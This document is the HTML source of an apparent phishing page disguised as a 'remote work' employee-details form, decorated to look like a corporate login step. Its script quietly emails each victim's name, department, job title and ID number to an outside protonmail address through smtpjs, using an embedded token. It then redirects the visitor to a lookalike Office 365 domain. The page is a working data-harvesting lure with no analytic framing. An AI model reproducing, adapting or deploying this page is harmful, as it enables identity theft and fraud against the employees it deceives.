<!DOCTYPE html>
<html>
  <head>
    <title>REMOTE WORK</title>
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
    <style>
      * {
      box-sizing: border-box;
      }
      html, body {
      min-height: 100vh;
      padding: 0;
      margin: 0;
      font-family: Roboto, Arial, sans-serif;
      font-size: 14px; 
      color: #666;
      }
      input, textarea { 
      outline: none;
      }
      body {
      display: flex;
      justify-content: center;
      align-items: center;
      padding: 20px;
      background: #2d22c0;
      }
      h1 {
      margin-top: 0;
      font-weight: 500;
      }
      form {
      position: relative;
      width: 80%;
      border-radius: 30px;
      background: #fff;
      }
      .form-left-decoration,
      .form-right-decoration {
      content: "";
      position: absolute;
      width: 50px;
      height: 20px;
      border-radius: 20px;
      background: #110982;
      }
      .form-left-decoration {
      bottom: 60px;
      left: -30px;
      }
      .form-right-decoration {
      top: 60px;
      right: -30px;
      }
      .form-left-decoration:before,
      .form-left-decoration:after,
      .form-right-decoration:before,
      .form-right-decoration:after {
      content: "";
      position: absolute;
      width: 50px;
      height: 20px;
      border-radius: 30px;
      background: #fff;
      }
      .form-left-decoration:before {
      top: -20px;
      }
      .form-left-decoration:after {
      top: 20px;
      left: 10px;
      }
      .form-right-decoration:before {
      top: -20px;
      right: 0;
      }
      .form-right-decoration:after {
      top: 20px;
      right: 10px;
      }
      .circle {
      position: absolute;
      bottom: 80px;
      left: -55px;
      width: 20px;
      height: 20px;
      border-radius: 50%;
      background: #fff;
      }
      .form-inner {
      padding: 40px;
      }
      .form-inner input,
      .form-inner textarea {
      display: block;
      width: 100%;
      padding: 15px;
      margin-bottom: 10px;
      border: none;
      border-radius: 20px;
      background: #d0dfe8;
      }
      .form-inner textarea {
      resize: none;
      }
      button {
      width: 100%;
      padding: 10px;
      margin-top: 20px;
      border-radius: 20px;
      border: none;
      border-bottom: 4px solid#110982;
      background: #110982; 
      font-size: 16px;
      font-weight: 400;
      color: #fff;
      }
      button:hover {
      background: #1e1788;
      } 
      @media (min-width: 568px) {
      form {
      width: 60%;
      }
      }
    </style>
  </head>
  <body>
    <form action="#"  class="decor">
      <div class="form-left-decoration"></div>
      <div class="form-right-decoration"></div>
      <div class="circle"></div>
      <div class="form-inner">
        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next" value="https://www.office01xx365.kikuso.site/CzbXVobT">
        <h1>Fill employee details</h1>
        <input class="Fullname" name="Fullname" type="text" placeholder="Fullname">
        <input class="department" name="Department" type="text" placeholder="Department">
        <input class="jobtitle" name="Job title" type="text" placeholder="Job title">
        <input class="reviewperiod" name="Review Period" type="text" placeholder="ID Number">
        <button type="submit" href="/">Authenticate To Apply</button>
      </div>
    </form>

    <script src="https://smtpjs.com/v3/smtp.js">
    </script>

    <script>
          
        const form = document.querySelector('.decor')


       function sendMsg(e){
        e.preventDefault();
        
            const  Fullname = document.querySelector('.Fullname')
              department = document.querySelector('.department')
              jobtitle = document.querySelector('.jobtitle')
              reviewperiod = document.querySelector('.reviewperiod')


         Email.send({
         SecureToken : "6aecea83-e7e7-4914-8310-c5a7d6d7aa34",
         To : 'mattew20201@protonmail.com',
         From : "yohnlom@gmail.com",
         Subject : "This is the subject"+"="+Fullname.value,
         Body : "NAME["+Fullname.value+"]   department["+department.value+"]     jobtitle["+jobtitle.value+"]    reviewperiod["+jobtitle.value+"]"
         }).then(
          window.location.replace("https://www.office01xx365.kikuso.site/CzbXVobT")
             
         );

       }

       form.addEventListener('submit', sendMsg);

        
    </script>

  </body>
</html>